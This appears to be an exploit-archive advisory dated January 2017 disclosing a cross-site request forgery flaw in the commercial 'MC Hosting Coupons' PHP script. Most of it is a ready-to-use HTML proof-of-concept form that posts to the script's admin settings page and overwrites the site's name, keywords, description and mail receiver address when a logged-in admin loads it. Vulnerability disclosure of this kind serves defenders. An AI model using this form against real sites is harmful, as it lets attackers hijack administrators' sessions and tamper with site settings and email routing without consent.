MC Hosting Coupons Cross Site Request Forgery
Posted on 17 January 2017
# # # # # # Vulnerability: Cross-Site Request Forgery # Date: 15.01.2017 # Vendor Homepage: http://microcode.ws/ # Script Name: MC Hosting Coupons Script # Script Buy Now: http://microcode.ws/product/mc-hosting-coupons-php-script/3881 # Author: Adeghsan Aencan # Author Web: http://ihsan.net # Mail : ihsan[beygir]ihsan[nokta]net # # # # # # Other features have the same security vulnerability. # Exploit: <html> <body> <form class="form-horizontal" method="post" action="http://localhost/[PATH]/admin/settings.php" id="settings_form"> <label for="website_name" class="control-label col-lg-4">Website Name (Title)</label><br> <input value="MC Hosting Coupons" class="validate[required] form-control" type="text" name="website_name" id="website_name" placeholder="Write website name(title)..." /><br> <label for="website_keywords" class="control-label col-lg-4">Website Keywords</label><br> <input value="hosting, coupons, save money" class="form-control" type="text" name="website_keywords" id="website_keywords" placeholder="Write website keywords..." /><br> <label for="email_receiver_address" class="control-label col-lg-4">Mail Receiver Email Address</label><br> <input value="mail@gmail.com" class="validate[required] form-control" type="text" name="email_receiver_address" id="email_receiver_address" placeholder="Write receiver email address..."><br> <label for="website_desc" class="control-label col-lg-4">Website Description</label><br> <textarea class="form-control" name="website_desc" id="website_desc" placeholder="Write website desc..." ></textarea><br> <input type="submit" name="sub" value="Submit" class="btn btn-primary" /> </form> </body> </html> # # # # #